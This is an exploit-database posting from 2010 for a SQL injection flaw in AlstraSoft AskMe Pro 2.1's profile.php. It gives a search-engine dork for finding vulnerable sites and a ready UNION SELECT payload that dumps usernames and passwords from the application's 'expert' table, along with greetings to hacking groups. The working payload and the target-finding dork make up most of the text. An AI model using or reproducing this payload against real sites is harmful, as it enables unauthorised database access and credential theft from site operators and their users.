AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability
# Published : 2010-09-12
# Author : CoBRa_21
# Previous Title : MOAUB #9 - FestOS CMS 2.3b Multiple Remote Vulnerabilities
# Next Title : Joomla Component (com_jphone) Local File Inclusion Vulnerability

########################################################################################
AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability 
########################################################################################

Author : CoBRa_21
Author Web Page : null [ I've sold my website (ipbul.org) ]
Dork : inurl:forum_answer.php?que_id
Script Page : http://www.alstrasoft.com/

########################################################################################
 
Sql Injection :

http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR & ipbul.org
########################################################################################